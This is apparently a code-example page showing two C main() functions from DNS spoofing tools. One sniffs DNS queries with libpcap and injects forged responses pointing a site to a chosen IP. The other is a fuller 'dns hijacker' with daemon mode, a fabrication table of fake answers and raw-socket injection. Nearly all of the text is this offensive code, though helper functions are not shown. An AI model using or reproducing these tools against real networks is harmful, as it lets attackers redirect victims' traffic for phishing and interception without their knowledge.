示例#1
0
int main(int argc, char **argv) {

  char *spoof_addr;
  char *site_name;
  char temp_site[128];
  char *device;
  char filter[1024];                 /* Capture filter */
  char errbuf[PCAP_ERRBUF_SIZE];     /* Error buffer */
  pcap_t* capdev;                    /* Capturing Device */
  const u_char *packet = NULL;
  struct pcap_pkthdr pcap_hdr;       /* Pcap packet header */
  libnet_t *handler;                 /* Libnet handler */

  int var;

  /* reserve the space for the spoofed packet */
  memset(&spoofpacket, '\0', sizeof(struct sp));

  /* get the spoofing IP address from input */
  spoof_addr = "222.106.38.120";
  site_name = "example.com";

  if (argc >= 2)
    spoof_addr = argv[1];
 
  if (argc >= 3)
    site_name = argv[2];

  if (strncmp(site_name, "www", 3) != 0) {
    strncpy(temp_site, "www.", 4);
    strcpy(temp_site+4, site_name);
    site_name = temp_site; 
  }

  /* get a device to sniff on */
    device = pcap_lookupdev(errbuf);
  
  if (device == NULL) {
    printf("%s\n", errbuf);
    exit(1);
  }

   strcpy(filter, "udp dst port 53");

   /* Setup for sniffering */
   capdev = set_cap_dev(device, filter);

   printf("Sniffering on: %s\n", device);
   printf("Spoofing address: %s\n", spoof_addr);
      
   for (;;)
    {

     packet = pcap_next(capdev, &pcap_hdr);
     
     /* Grab a packet */
     /**** USE: pcap function to grab next packet****/
     
     if (packet == NULL) 
      {
       continue;
      }
	

  //   printf("Packet Length%d\n", pcap_hdr.len);

    
     //printf("Return value: %d", var);
     
    /* If the packet is a DNS query, create a packet */
    if ((analyze_packet(packet, (int)pcap_hdr.caplen, spoof_addr, site_name)) == 1) 
      {
       //  printf("DNS packet found\n");
      // Inject the spoofed DNS response
  //       printf("Device: %s", device);
         spoof_dns(device);
       //  printf("YAY! DNS packet sent\n");
       //  return 1;
      }
    }
   
   return 0;
}
示例#2
0
int main (int argc, char **argv)    {
    int  i,
         opt,
         socket;                    /* socket to write on             */
    char *packet,                   /* captured packet                */
         *device          = NULL,   /* interface to sniff on          */
         *ft_filename     = NULL,   /* fabrication table filename     */
         *output_filename = NULL,   /* output statistics filename     */
         filter[1024],              /* tcpdump style capture filter   */
         errbuf[PCAP_ERRBUF_SIZE];  /* error buffer for pcap          */
    pid_t pid;                      /* used in daemonizing            */
    FILE *os;                       /* output statistics file handle  */
    struct pcap_pkthdr pcap_h;      /* pcap packet header             */
    pcap_t *capdev;                 /* the capture device             */

    /*
     *  catch sig
     */

    /*if (signal(SIGINT, catch_signals) == SIG_ERR)   {
        perror ("sigset failed for SIGINT");
        exit (EXIT_FAILURE);
    }*/

    /*
     *  prepare the chewy center
     */

    memset(&chewycenter, '\0', sizeof(struct cc));

    /*
     *  parse the command line
     */

    while ((opt = getopt(argc, argv, "d:f:hi:o:psvz")) != EOF)    {
        switch (opt)  {
            case 'd':               /* default answer */
                chewycenter.default_answer = optarg;
                dflag++;
                break;
            case 'f':               /* fabrication table */
                ft_filename = optarg;
                fflag++;
                break;
            case 'i':               /* interface */
                device = optarg;
                break;
            case 'o':               /* output statistics filename */
                output_filename = optarg;
                oflag++;
                break;
            case 'p':               /* print only */
                pflag++;
                break;
            case 's':               /* supress printing of "ignored *" */
                sflag++;
                break;
            case 'v':               /* verbose */
                vflag++;
                break;
            case 'z':               /* daemonize */
                zflag++;
                break;
            case 'h':               /* usage */
            case '?':
                usage(argv);
                break;
        }
    }

    /*
     *  if there is no default spoof address or fabrication table specified
     *  and the user doesn't just want to print captured dns packets
     *  then we have a problem, because we have no idea what to spoof answers with
     */

    if (!dflag && !fflag && !pflag)
        usage(argv);

    /*
     *  if a fabrication table file was specified fill the ftable with values from it
     */

    if (fflag)
        fill_table(ft_filename);

    /*
     * daemonize if we have to
     * we do this after we fill the table because we chdir() here
     */

    if (zflag)  {
        pid = fork();

        if (pid < 0) {
            printf("\ncould not daemonize");
            exit (EXIT_FAILURE);
        }

        if (pid != 0)
            exit (EXIT_SUCCESS);

        fclose(stdin); fclose(stdout); fclose(stderr);
        setsid();
        chdir("/");
        umask(0);
    }

    /*
     *  make sure there is a device to sniff on
     */

    if (!device)
        device = pcap_lookupdev(errbuf);

    if (!device) {
        fprintf(stderr, "\ndevice lookup failed");
        exit (EXIT_FAILURE);
     }

    /*
     *  set capture filter
     *  defaults to only capturing traffic destined to a nameserver
     */

    argc -= optind;
    argv += optind;

    strcpy(filter, "udp dst port 53");
    if (argc != 0)  {
        strcat(filter, " and ");
        strcat(filter, copy_argv(argv));
    }

    /*
     *  prepare the device for capturing
     */

    capdev = set_cap_dev(device, filter);

    /*
     *  if we're not only watching grab a socket to write on
     */

    if (!pflag)
        if ((socket = libnet_open_raw_sock(IPPROTO_RAW)) == -1)
            libnet_error(LIBNET_ERR_FATAL, "network initialization failed\n");

    /*
     *  print some informative information
     */

    printf("\n[ dns hijacker %s ]\n", VERSION);
    printf("\nsniffing on:       %s", device);
    printf("\nusing filter:      %s", filter);
    if (dflag) printf("\ndefault answer:    %s", chewycenter.default_answer);
    if (fflag) printf("\nfabrication table: %s", ft_filename);
    if (pflag) printf("\nprint only mode");
    if (sflag) printf("\nsuppressing ignored activity output");
    printf("\n");

    /*
     *  main loop
     *  this is where it all happens...
     *  - sniff a packet
     *  - parse through that packet printing packet information and
     *    store relevant values in our struct
     *  - build an appropriate fabricated answer and
     *    store it in our struct
     *  - if we're not only watching
     *    write the packet
     *  - if we want to store statistics and we're not only watching
     *    open, write to, and close the statistics file
     */

    for (;;)   {
        packet = (u_char *)pcap_next(capdev, &pcap_h);

        if (packet == NULL)
            continue;

        parse_dns(packet, (int)pcap_h.caplen);

        if (!pflag)
            spoof_dns(socket);

        if (oflag && !pflag)  {
            os = fopen(output_filename, "w+");
            fprintf(os, "%d", num_spoofed_answers);
            fclose(os);
        }
    }

    /* not reached */
    return (EXIT_SUCCESS);
}